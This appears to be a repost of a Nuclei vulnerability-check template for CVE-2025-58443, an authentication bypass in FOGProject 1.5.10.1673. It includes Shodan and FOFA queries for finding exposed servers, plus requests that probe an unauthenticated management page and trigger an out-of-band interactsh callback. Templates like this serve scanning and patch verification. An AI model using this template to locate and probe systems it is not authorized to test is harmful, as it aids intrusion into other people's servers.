FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information.
PoC代码[已公开]
id: CVE-2025-58443
info:
name: FOGProject <= 1.5.10.1673 - Authentication Bypass
author: oleveloper
severity: critical
description: |
FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information.
reference:
- https://github.com/casp3r0x0/CVE-2025-58443
- https://nvd.nist.gov/vuln/detail/CVE-2025-58443
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2025-58443
epss-score: 0.08967
epss-percentile: 0.9225
cwe-id: CWE-287
metadata:
max-request: 3
vendor: fogproject
product: fogproject
fofa-query: icon_hash="-1952619005"
shodan-query: http.favicon.hash:-1952619005
tags: cve,cve2025,fogproject,auth-bypass
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
matchers:
- type: dsl
dsl:
- "contains(body, 'FOG')"
- "status_code == 200"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/fog/management/index.php?node=about&sub=kernel"
- "{{BaseURL}}/fog/service/getversion.php?url={{interactsh-url}}"
matchers-condition: or
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(interactsh_protocol,'dns')"
condition: and
- type: dsl
dsl:
- "status_code == 200"
- "regex('(?is)FOG.*Configuration.*(?:Kernel|bzImage)', body)"
condition: and
# digest: 4b0a00483046022100a441637ec244919dfde19b4840cd374ab07b54b69bb57b60dc3bb5d3111e1337022100e4f2a6bf738f94d026aa09f232563fe000692506af7ab5e37ea9e2725e431c22:922c64590222798bb761d5b6d8e72950